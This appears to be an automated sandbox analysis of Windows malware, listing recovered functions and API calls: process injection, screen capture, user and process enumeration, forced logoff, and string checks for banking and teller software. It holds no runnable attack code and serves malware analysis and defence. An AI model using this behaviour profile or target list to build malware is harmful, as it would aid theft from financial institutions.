GetTickCount.KERNEL32 ref: 00FCAA11
GetLastInputInfo.USER32(?), ref: 00FCAA24
GetLocalTime.KERNEL32(?), ref: 00FCAA48

Part of subcall function 00FED979: SystemTimeToFileTime.KERNEL32(?,?), ref: 00FED983

GetTimeZoneInformation.KERNEL32(?), ref: 00FCAA60

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00FDDBC4, Relevance: 1.6, APIs: 1, Instructions: 80

APIs

Part of subcall function 00FD5A4F: GetLastError.KERNEL32(?,?,00FCB9B4), ref: 00FD5A51
Part of subcall function 00FD5A4F: TlsGetValue.KERNEL32(?,?,00FCB9B4), ref: 00FD5A6E
Part of subcall function 00FD5A4F: TlsSetValue.KERNEL32(00000001), ref: 00FD5A80
Part of subcall function 00FD5A4F: SetLastError.KERNEL32(?,?,00FCB9B4), ref: 00FD5A90

LdrGetDllHandle.NTDLL(?,00000000,?,?), ref: 00FDDC28

Part of subcall function 00FD19E0: EnterCriticalSection.KERNEL32(01111E90), ref: 00FD19EE
Part of subcall function 00FD19E0: PathFindFileNameW.SHLWAPI(?), ref: 00FD1A21
Part of subcall function 00FD19E0: PathFindFileNameW.SHLWAPI(?), ref: 00FD1A64
Part of subcall function 00FD19E0: LeaveCriticalSection.KERNEL32(01111E90), ref: 00FD1A9E

Part of subcall function 00FD5AD5: GetLastError.KERNEL32(?,00FCBA1E), ref: 00FD5AD6
Part of subcall function 00FD5AD5: TlsSetValue.KERNEL32(00000000), ref: 00FD5AE6
Part of subcall function 00FD5AD5: SetLastError.KERNEL32(?,?,00FCBA1E), ref: 00FD5AED

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00FF40AB, Relevance: 1.5, APIs: 1, Instructions: 15

APIs

CreateRemoteThread.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000), ref: 00FF40BC

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00FCDBE8, Relevance: 66.8, APIs: 19, Strings: 19, Instructions: 103

APIs

StrStrIW.SHLWAPI(tellerplus), ref: 00FCDBFA
StrStrIW.SHLWAPI(bancline), ref: 00FCDC0F
StrStrIW.SHLWAPI(fidelity), ref: 00FCDC24
StrStrIW.SHLWAPI(micrsolv), ref: 00FCDC39
StrStrIW.SHLWAPI(bankman), ref: 00FCDC4E
StrStrIW.SHLWAPI(vantiv), ref: 00FCDC63
StrStrIW.SHLWAPI(episys), ref: 00FCDC78
StrStrIW.SHLWAPI(jack henry), ref: 00FCDC8D
StrStrIW.SHLWAPI(cruisenet), ref: 00FCDCA2
StrStrIW.SHLWAPI(gplusmain), ref: 00FCDCB7
StrStrIW.SHLWAPI(launchpadshell.exe), ref: 00FCDCCC
StrStrIW.SHLWAPI(dirclt32.exe), ref: 00FCDCE1
StrStrIW.SHLWAPI(wtng.exe), ref: 00FCDCF2
StrStrIW.SHLWAPI(prologue.exe), ref: 00FCDD03
StrStrIW.SHLWAPI(silverlake), ref: 00FCDD14
StrStrIW.SHLWAPI(pcsws.exe), ref: 00FCDD25
StrStrIW.SHLWAPI(v48d0250s1), ref: 00FCDD36
StrStrIW.SHLWAPI(fdmaster.exe), ref: 00FCDD47
StrStrIW.SHLWAPI(fastdoc), ref: 00FCDD58

Strings

tellerplus, xrefs: 00FCDBEF
bancline, xrefs: 00FCDC04
fidelity, xrefs: 00FCDC19
micrsolv, xrefs: 00FCDC2E
bankman, xrefs: 00FCDC43
vantiv, xrefs: 00FCDC58
episys, xrefs: 00FCDC6D
jack henry, xrefs: 00FCDC82
cruisenet, xrefs: 00FCDC97
gplusmain, xrefs: 00FCDCAC
launchpadshell.exe, xrefs: 00FCDCC1
dirclt32.exe, xrefs: 00FCDCD6
wtng.exe, xrefs: 00FCDCE7
prologue.exe, xrefs: 00FCDCF8
silverlake, xrefs: 00FCDD09
pcsws.exe, xrefs: 00FCDD1A
v48d0250s1, xrefs: 00FCDD2B
fdmaster.exe, xrefs: 00FCDD3C
fastdoc, xrefs: 00FCDD4D

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C2DBE8, Relevance: 66.8, APIs: 19, Strings: 19, Instructions: 103

APIs

StrStrIW.SHLWAPI(tellerplus), ref: 00C2DBFA
StrStrIW.SHLWAPI(bancline), ref: 00C2DC0F
StrStrIW.SHLWAPI(fidelity), ref: 00C2DC24
StrStrIW.SHLWAPI(micrsolv), ref: 00C2DC39
StrStrIW.SHLWAPI(bankman), ref: 00C2DC4E
StrStrIW.SHLWAPI(vantiv), ref: 00C2DC63
StrStrIW.SHLWAPI(episys), ref: 00C2DC78
StrStrIW.SHLWAPI(jack henry), ref: 00C2DC8D
StrStrIW.SHLWAPI(cruisenet), ref: 00C2DCA2
StrStrIW.SHLWAPI(gplusmain), ref: 00C2DCB7
StrStrIW.SHLWAPI(launchpadshell.exe), ref: 00C2DCCC
StrStrIW.SHLWAPI(dirclt32.exe), ref: 00C2DCE1
StrStrIW.SHLWAPI(wtng.exe), ref: 00C2DCF2
StrStrIW.SHLWAPI(prologue.exe), ref: 00C2DD03
StrStrIW.SHLWAPI(silverlake), ref: 00C2DD14
StrStrIW.SHLWAPI(pcsws.exe), ref: 00C2DD25
StrStrIW.SHLWAPI(v48d0250s1), ref: 00C2DD36
StrStrIW.SHLWAPI(fdmaster.exe), ref: 00C2DD47
StrStrIW.SHLWAPI(fastdoc), ref: 00C2DD58

Strings

tellerplus, xrefs: 00C2DBEF
bancline, xrefs: 00C2DC04
fidelity, xrefs: 00C2DC19
micrsolv, xrefs: 00C2DC2E
bankman, xrefs: 00C2DC43
vantiv, xrefs: 00C2DC58
episys, xrefs: 00C2DC6D
jack henry, xrefs: 00C2DC82
cruisenet, xrefs: 00C2DC97
gplusmain, xrefs: 00C2DCAC
launchpadshell.exe, xrefs: 00C2DCC1
dirclt32.exe, xrefs: 00C2DCD6
wtng.exe, xrefs: 00C2DCE7
prologue.exe, xrefs: 00C2DCF8
silverlake, xrefs: 00C2DD09
pcsws.exe, xrefs: 00C2DD1A
v48d0250s1, xrefs: 00C2DD2B
fdmaster.exe, xrefs: 00C2DD3C
fastdoc, xrefs: 00C2DD4D

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD4085, Relevance: 48.4, APIs: 20, Strings: 4, Instructions: 151

APIs

LoadLibraryA.KERNEL32(gdiplus.dll), ref: 00FD4097
GetProcAddress.KERNEL32(?,GdiplusStartup), ref: 00FD40AF
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00FD40EE
CreateCompatibleDC.GDI32 ref: 00FD40FF
LoadCursorW.USER32(00000000,00007F00), ref: 00FD4115
GetIconInfo.USER32(?,?), ref: 00FD4129
GetCursorPos.USER32(?), ref: 00FD4138
GetDeviceCaps.GDI32(?,00000008), ref: 00FD414F
GetDeviceCaps.GDI32(?,0000000A), ref: 00FD4158
CreateCompatibleBitmap.GDI32(?,?), ref: 00FD4164
SelectObject.GDI32 ref: 00FD4172
BitBlt.GDI32(?,00000000,00000000,?,0000000A,?,00000000,00000000,40CC0020), ref: 00FD4193
DrawIcon.USER32(?,?,?,?), ref: 00FD41C5

Part of subcall function 00FD332C: GetProcAddress.KERNEL32(?,GdipCreateBitmapFromHBITMAP), ref: 00FD3341
Part of subcall function 00FD332C: GetProcAddress.KERNEL32(?,GdipDisposeImage), ref: 00FD334C

SelectObject.GDI32(?,00000008), ref: 00FD41E1
DeleteObject.GDI32 ref: 00FD41E8
DeleteDC.GDI32 ref: 00FD41EF
DeleteDC.GDI32 ref: 00FD41F6
FreeLibrary.KERNEL32(?), ref: 00FD4206
GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 00FD421C
FreeLibrary.KERNEL32(?), ref: 00FD4230

Strings

gdiplus.dll, xrefs: 00FD408C
GdiplusStartup, xrefs: 00FD40A9
DISPLAY, xrefs: 00FD40E9
GdiplusShutdown, xrefs: 00FD4216

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C34085, Relevance: 48.4, APIs: 20, Strings: 4, Instructions: 151

APIs

LoadLibraryA.KERNEL32(gdiplus.dll), ref: 00C34097
GetProcAddress.KERNEL32(?,GdiplusStartup), ref: 00C340AF
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C340EE
CreateCompatibleDC.GDI32 ref: 00C340FF
LoadCursorW.USER32(00000000,00007F00), ref: 00C34115
GetIconInfo.USER32(?,?), ref: 00C34129
GetCursorPos.USER32(?), ref: 00C34138
GetDeviceCaps.GDI32(?,00000008), ref: 00C3414F
GetDeviceCaps.GDI32(?,0000000A), ref: 00C34158
CreateCompatibleBitmap.GDI32(?,?), ref: 00C34164
SelectObject.GDI32 ref: 00C34172
BitBlt.GDI32(?,00000000,00000000,?,0000000A,?,00000000,00000000,40CC0020), ref: 00C34193
DrawIcon.USER32(?,?,?,?), ref: 00C341C5

Part of subcall function 00C3332C: GetProcAddress.KERNEL32(?,GdipCreateBitmapFromHBITMAP), ref: 00C33341
Part of subcall function 00C3332C: GetProcAddress.KERNEL32(?,GdipDisposeImage), ref: 00C3334C

SelectObject.GDI32(?,00000008), ref: 00C341E1
DeleteObject.GDI32 ref: 00C341E8
DeleteDC.GDI32 ref: 00C341EF
DeleteDC.GDI32 ref: 00C341F6
FreeLibrary.KERNEL32(?), ref: 00C34206
GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 00C3421C
FreeLibrary.KERNEL32(?), ref: 00C34230

Strings

gdiplus.dll, xrefs: 00C3408C
GdiplusStartup, xrefs: 00C340A9
DISPLAY, xrefs: 00C340E9
GdiplusShutdown, xrefs: 00C34216

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD6A69, Relevance: 37.4, APIs: 1, Instructions: 7

APIs

HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C36A69, Relevance: 36.9, APIs: 1, Instructions: 7

APIs

HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C45087, Relevance: 34.4, APIs: 16, Strings: 1, Instructions: 241

APIs

Part of subcall function 00C31B16: CreateFileW.KERNEL32(00F41EF0,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C31B2F
Part of subcall function 00C31B16: GetFileSizeEx.KERNEL32(?,?), ref: 00C31B42
Part of subcall function 00C31B16: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00C31B68
Part of subcall function 00C31B16: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00C31B80
Part of subcall function 00C31B16: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C31B9E
Part of subcall function 00C31B16: CloseHandle.KERNEL32 ref: 00C31BA7

CreateMutexW.KERNEL32(00C62974,00000001,?), ref: 00C4512D
GetLastError.KERNEL32(?,?,00000001,?,?,?,00C45452), ref: 00C4513D
CloseHandle.KERNEL32 ref: 00C4514B
CloseHandle.KERNEL32 ref: 00C45229

Part of subcall function 00C44BA2: memcpy.MSVCRT ref: 00C44BB2

lstrlenW.KERNEL32(?), ref: 00C451AD

Part of subcall function 00C54181: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C541A1
Part of subcall function 00C54181: Process32FirstW.KERNEL32(?,?), ref: 00C541C6
Part of subcall function 00C54181: OpenProcess.KERNEL32(00000400,00000000,?), ref: 00C5421D
Part of subcall function 00C54181: CloseHandle.KERNEL32 ref: 00C5423B
Part of subcall function 00C54181: GetLengthSid.ADVAPI32(?,?,?,?,?,?,?,00000001), ref: 00C54257
Part of subcall function 00C54181: memcmp.MSVCRT ref: 00C5426F
Part of subcall function 00C54181: CloseHandle.KERNEL32(?), ref: 00C542E7
Part of subcall function 00C54181: Process32NextW.KERNEL32(?,?), ref: 00C542F3
Part of subcall function 00C54181: CloseHandle.KERNEL32 ref: 00C54306

ExitWindowsEx.USER32(00000014,80000000), ref: 00C451DD
OpenEventW.KERNEL32(00000002,00000000,?), ref: 00C45203
SetEvent.KERNEL32 ref: 00C45210
CloseHandle.KERNEL32 ref: 00C45217
IsWellKnownSid.ADVAPI32(00F41EC0,00000016), ref: 00C45279
CreateEventW.KERNEL32(00C62974,00000001,00000000,?), ref: 00C45348
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C45361
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00C45373
CloseHandle.KERNEL32(00000000), ref: 00C4538A
CloseHandle.KERNEL32(?), ref: 00C45390
CloseHandle.KERNEL32(?), ref: 00C45396

Part of subcall function 00C32FB7: ReleaseMutex.KERNEL32 ref: 00C32FBB
Part of subcall function 00C32FB7: CloseHandle.KERNEL32 ref: 00C32FC2

Part of subcall function 00C3E8A2: VirtualProtect.KERNEL32(00C39777,?,00000040,?), ref: 00C3E8BA
Part of subcall function 00C3E8A2: VirtualProtect.KERNEL32(00C39777,?,?,?), ref: 00C3E92D

Part of subcall function 00C39777: lstrlenW.KERNEL32(C:\Documents and Settings\Administrator\Application Data), ref: 00C39832
Part of subcall function 00C39777: CloseHandle.KERNEL32 ref: 00C3989F
Part of subcall function 00C39777: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00C398AD
Part of subcall function 00C39777: memcpy.MSVCRT ref: 00C398E8
Part of subcall function 00C39777: lstrcpyW.KERNEL32(?,?), ref: 00C398FD
Part of subcall function 00C39777: CloseHandle.KERNEL32 ref: 00C39916

Part of subcall function 00C4BAD3: memcpy.MSVCRT ref: 00C4BAEE
Part of subcall function 00C4BAD3: StringFromGUID2.OLE32(?), ref: 00C4BB92

Part of subcall function 00C399FA: LoadLibraryW.KERNEL32(?), ref: 00C39A1C
Part of subcall function 00C399FA: GetProcAddress.KERNEL32(?,?), ref: 00C39A40
Part of subcall function 00C399FA: SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 00C39A78
Part of subcall function 00C399FA: lstrlenW.KERNEL32(?), ref: 00C39A90
Part of subcall function 00C399FA: StrCmpNIW.SHLWAPI(?,?), ref: 00C39AA4
Part of subcall function 00C399FA: lstrlenW.KERNEL32(?), ref: 00C39ABA
Part of subcall function 00C399FA: memcpy.MSVCRT ref: 00C39AC6
Part of subcall function 00C399FA: FreeLibrary.KERNEL32 ref: 00C39ADC
Part of subcall function 00C399FA: NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,?,?,?), ref: 00C39B1B
Part of subcall function 00C399FA: NetUserGetInfo.NETAPI32(00000000,00000000,00000017,?), ref: 00C39B57
Part of subcall function 00C399FA: NetApiBufferFree.NETAPI32(?), ref: 00C39C02
Part of subcall function 00C399FA: NetApiBufferFree.NETAPI32(00000000), ref: 00C39C14
Part of subcall function 00C399FA: SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 00C39C33

Part of subcall function 00C35433: CharToOemW.USER32(00F41EF0,?), ref: 00C35444

Part of subcall function 00C4B0C1: GetCommandLineW.KERNEL32 ref: 00C4B0DB
Part of subcall function 00C4B0C1: CommandLineToArgvW.SHELL32 ref: 00C4B0E2
Part of subcall function 00C4B0C1: StrCmpNW.SHLWAPI(?,00C27F1C,00000002), ref: 00C4B108
Part of subcall function 00C4B0C1: LocalFree.KERNEL32 ref: 00C4B134
Part of subcall function 00C4B0C1: MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,00001000), ref: 00C4B171
Part of subcall function 00C4B0C1: memcpy.MSVCRT ref: 00C4B184
Part of subcall function 00C4B0C1: UnmapViewOfFile.KERNEL32 ref: 00C4B1BD
Part of subcall function 00C4B0C1: memcpy.MSVCRT ref: 00C4B1E0
Part of subcall function 00C4B0C1: CloseHandle.KERNEL32 ref: 00C4B1F9

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C4BEE3: CreateMutexW.KERNEL32(00C62974,00000000,?), ref: 00C4BF05

Part of subcall function 00C39925: memcpy.MSVCRT ref: 00C3993C
Part of subcall function 00C39925: memcmp.MSVCRT ref: 00C3995E
Part of subcall function 00C39925: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C3998C
Part of subcall function 00C39925: lstrcmpiW.KERNEL32(?), ref: 00C399DC

Part of subcall function 00C31BB5: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C31BC6
Part of subcall function 00C31BB5: CloseHandle.KERNEL32 ref: 00C31BD5

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00C45304

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD99FA, Relevance: 28.4, APIs: 13, Strings: 1, Instructions: 205

APIs

LoadLibraryW.KERNEL32(?), ref: 00FD9A1C
GetProcAddress.KERNEL32(?,?), ref: 00FD9A40
SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 00FD9A78
lstrlenW.KERNEL32(?), ref: 00FD9A90
StrCmpNIW.SHLWAPI(?,?), ref: 00FD9AA4
lstrlenW.KERNEL32(?), ref: 00FD9ABA
memcpy.MSVCRT ref: 00FD9AC6
FreeLibrary.KERNEL32 ref: 00FD9ADC
NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,?,?,?), ref: 00FD9B1B
NetUserGetInfo.NETAPI32(00000000,00000000,00000017,?), ref: 00FD9B57

Part of subcall function 00FE4ED1: ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00FE4EE5
Part of subcall function 00FE4ED1: PathUnquoteSpacesW.SHLWAPI(?), ref: 00FE4F4A
Part of subcall function 00FE4ED1: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00FE4F59
Part of subcall function 00FE4ED1: LocalFree.KERNEL32(00000001), ref: 00FE4F6D

NetApiBufferFree.NETAPI32(?), ref: 00FD9C02

Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE439E
Part of subcall function 00FE432D: PathRemoveBackslashW.SHLWAPI ref: 00FE43A8
Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE43F1
Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE441E
Part of subcall function 00FE432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00FE4428

Part of subcall function 00FE4461: PathSkipRootW.SHLWAPI(?), ref: 00FE448B
Part of subcall function 00FE4461: GetFileAttributesW.KERNEL32(?), ref: 00FE44B8
Part of subcall function 00FE4461: CreateDirectoryW.KERNEL32(?,00000000), ref: 00FE44CC
Part of subcall function 00FE4461: SetLastError.KERNEL32(00000050), ref: 00FE44EF

Part of subcall function 00FD9633: LoadLibraryW.KERNEL32(?), ref: 00FD9657
Part of subcall function 00FD9633: GetProcAddress.KERNEL32(?,?), ref: 00FD9685
Part of subcall function 00FD9633: GetProcAddress.KERNEL32(?,?), ref: 00FD969F
Part of subcall function 00FD9633: GetProcAddress.KERNEL32(?,?), ref: 00FD96BB
Part of subcall function 00FD9633: WTSGetActiveConsoleSessionId.KERNEL32 ref: 00FD96E8
Part of subcall function 00FD9633: FreeLibrary.KERNEL32 ref: 00FD9769

NetApiBufferFree.NETAPI32(00000000), ref: 00FD9C14
SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 00FD9C33

Part of subcall function 00FEB70A: CreateDirectoryW.KERNEL32(?,00000000), ref: 00FEB783
Part of subcall function 00FEB70A: SetFileAttributesW.KERNEL32(?), ref: 00FEB7A2
Part of subcall function 00FEB70A: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000001,?,00000000), ref: 00FEB7B9
Part of subcall function 00FEB70A: GetLastError.KERNEL32(?,00000002,?,?), ref: 00FEB7C6
Part of subcall function 00FEB70A: CloseHandle.KERNEL32 ref: 00FEB7FF

Part of subcall function 00FD7058: GetFileSizeEx.KERNEL32(00000000,?), ref: 00FD708F
Part of subcall function 00FD7058: SetEndOfFile.KERNEL32 ref: 00FD7105
Part of subcall function 00FD7058: FlushFileBuffers.KERNEL32(?), ref: 00FD7110

Strings

.exe, xrefs: 00FD9BBC 00FD9C4D

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C399FA, Relevance: 28.4, APIs: 13, Strings: 1, Instructions: 205

APIs

LoadLibraryW.KERNEL32(?), ref: 00C39A1C
GetProcAddress.KERNEL32(?,?), ref: 00C39A40
SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 00C39A78
lstrlenW.KERNEL32(?), ref: 00C39A90
StrCmpNIW.SHLWAPI(?,?), ref: 00C39AA4
lstrlenW.KERNEL32(?), ref: 00C39ABA
memcpy.MSVCRT ref: 00C39AC6
FreeLibrary.KERNEL32 ref: 00C39ADC
NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,?,?,?), ref: 00C39B1B
NetUserGetInfo.NETAPI32(00000000,00000000,00000017,?), ref: 00C39B57

Part of subcall function 00C44ED1: ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00C44EE5
Part of subcall function 00C44ED1: PathUnquoteSpacesW.SHLWAPI(?), ref: 00C44F4A
Part of subcall function 00C44ED1: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00C44F59
Part of subcall function 00C44ED1: LocalFree.KERNEL32(00000001), ref: 00C44F6D

NetApiBufferFree.NETAPI32(?), ref: 00C39C02

Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4439E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI ref: 00C443A8
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C443F1
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4441E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00C44428

Part of subcall function 00C44461: PathSkipRootW.SHLWAPI(?), ref: 00C4448B
Part of subcall function 00C44461: GetFileAttributesW.KERNEL32(?), ref: 00C444B8
Part of subcall function 00C44461: CreateDirectoryW.KERNEL32(?,00000000), ref: 00C444CC
Part of subcall function 00C44461: SetLastError.KERNEL32(00000050), ref: 00C444EF

Part of subcall function 00C39633: LoadLibraryW.KERNEL32(?), ref: 00C39657
Part of subcall function 00C39633: GetProcAddress.KERNEL32(?,?), ref: 00C39685
Part of subcall function 00C39633: GetProcAddress.KERNEL32(?,?), ref: 00C3969F
Part of subcall function 00C39633: GetProcAddress.KERNEL32(?,?), ref: 00C396BB
Part of subcall function 00C39633: WTSGetActiveConsoleSessionId.KERNEL32 ref: 00C396E8
Part of subcall function 00C39633: FreeLibrary.KERNEL32 ref: 00C39769

NetApiBufferFree.NETAPI32(00000000), ref: 00C39C14
SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 00C39C33

Part of subcall function 00C4B70A: NlsGetCacheUpdateCount.KERNEL32(?,00000000), ref: 00C4B783
Part of subcall function 00C4B70A: SetFileAttributesW.KERNEL32(?), ref: 00C4B7A2
Part of subcall function 00C4B70A: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000001,?,00000000), ref: 00C4B7B9
Part of subcall function 00C4B70A: GetLastError.KERNEL32(?,00000002,?,?), ref: 00C4B7C6
Part of subcall function 00C4B70A: CloseHandle.KERNEL32 ref: 00C4B7FF

Part of subcall function 00C37058: GetFileSizeEx.KERNEL32(00000000,?), ref: 00C3708F
Part of subcall function 00C37058: SetEndOfFile.KERNEL32 ref: 00C37105
Part of subcall function 00C37058: FlushFileBuffers.KERNEL32(?), ref: 00C37110

Strings

.exe, xrefs: 00C39BBC 00C39C4D

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FDD2B1, Relevance: 27.2, APIs: 18, Instructions: 214

APIs

GetProcAddress.KERNEL32(?,?), ref: 00FDD2D5
GetProcAddress.KERNEL32(?,?), ref: 00FDD2F5
GetProcAddress.KERNEL32(?,?), ref: 00FDD30E
GetProcAddress.KERNEL32(?,?), ref: 00FDD327
GetProcAddress.KERNEL32(?,?), ref: 00FDD340
GetProcAddress.KERNEL32(?,?), ref: 00FDD359
GetProcAddress.KERNEL32(?,?), ref: 00FDD376
GetProcAddress.KERNEL32(?,?), ref: 00FDD393
GetProcAddress.KERNEL32(?,?), ref: 00FDD3B0
GetProcAddress.KERNEL32(?,?), ref: 00FDD3CD
GetProcAddress.KERNEL32(?,?), ref: 00FDD3EA
GetProcAddress.KERNEL32(?,?), ref: 00FDD407
GetProcAddress.KERNEL32(?,?), ref: 00FDD424
GetProcAddress.KERNEL32(?,?), ref: 00FDD441
GetProcAddress.KERNEL32(?,?), ref: 00FDD45E
GetProcAddress.KERNEL32(?,?), ref: 00FDD47B
GetProcAddress.KERNEL32(?,?), ref: 00FDD498
GetProcAddress.KERNEL32(?,?), ref: 00FDD4B5

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C3D2B1, Relevance: 27.2, APIs: 18, Instructions: 214

APIs

GetProcAddress.KERNEL32(?,?), ref: 00C3D2D5
GetProcAddress.KERNEL32(?,?), ref: 00C3D2F5
GetProcAddress.KERNEL32(?,?), ref: 00C3D30E
GetProcAddress.KERNEL32(?,?), ref: 00C3D327
GetProcAddress.KERNEL32(?,?), ref: 00C3D340
GetProcAddress.KERNEL32(?,?), ref: 00C3D359
GetProcAddress.KERNEL32(?,?), ref: 00C3D376
GetProcAddress.KERNEL32(?,?), ref: 00C3D393
GetProcAddress.KERNEL32(?,?), ref: 00C3D3B0
GetProcAddress.KERNEL32(?,?), ref: 00C3D3CD
GetProcAddress.KERNEL32(?,?), ref: 00C3D3EA
GetProcAddress.KERNEL32(?,?), ref: 00C3D407
GetProcAddress.KERNEL32(?,?), ref: 00C3D424
GetProcAddress.KERNEL32(?,?), ref: 00C3D441
GetProcAddress.KERNEL32(?,?), ref: 00C3D45E
GetProcAddress.KERNEL32(?,?), ref: 00C3D47B
GetProcAddress.KERNEL32(?,?), ref: 00C3D498
GetProcAddress.KERNEL32(?,?), ref: 00C3D4B5

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD9C8D, Relevance: 24.4, APIs: 10, Strings: 2, Instructions: 184

APIs

Part of subcall function 00FC9F72: memcpy.MSVCRT ref: 00FC9F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00FD9CCE
PathRemoveFileSpecW.SHLWAPI(?), ref: 00FD9D17
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00FD9D3E
PathRemoveFileSpecW.SHLWAPI(?), ref: 00FD9D87
SetEvent.KERNEL32 ref: 00FD9D9A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FD9DAD

Part of subcall function 00FDE4B6: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00FDE4E9
Part of subcall function 00FDE4B6: Sleep.KERNEL32(000001F4), ref: 00FDE57E

Part of subcall function 00FE44FB: FindFirstFileW.KERNEL32(?,?), ref: 00FE452C
Part of subcall function 00FE44FB: FindNextFileW.KERNEL32(?,?), ref: 00FE457E
Part of subcall function 00FE44FB: FindClose.KERNEL32 ref: 00FE4589
Part of subcall function 00FE44FB: SetFileAttributesW.KERNEL32(?,00000080), ref: 00FE4595
Part of subcall function 00FE44FB: RemoveDirectoryW.KERNEL32(?), ref: 00FE459C

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00FD9DF1

Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE439E
Part of subcall function 00FE432D: PathRemoveBackslashW.SHLWAPI ref: 00FE43A8
Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE43F1
Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE441E
Part of subcall function 00FE432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00FE4428

Part of subcall function 00FE10E0: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FE113B
Part of subcall function 00FE10E0: RegEnumKeyExW.ADVAPI32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00FE11A5
Part of subcall function 00FE10E0: RegFlushKey.ADVAPI32(00000000), ref: 00FE11D3
Part of subcall function 00FE10E0: RegCloseKey.ADVAPI32(00000000), ref: 00FE11DA

CharToOemW.USER32(?,?), ref: 00FD9E6F
CharToOemW.USER32(?,?), ref: 00FD9E81
ExitProcess.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 00FD9EEC

Part of subcall function 00FD5482: CharToOemW.USER32(?,?), ref: 00FD54C8
Part of subcall function 00FD5482: WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00FD54FF
Part of subcall function 00FD5482: CloseHandle.KERNEL32(000000FF), ref: 00FD5527
Part of subcall function 00FD5482: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104), ref: 00FD5569
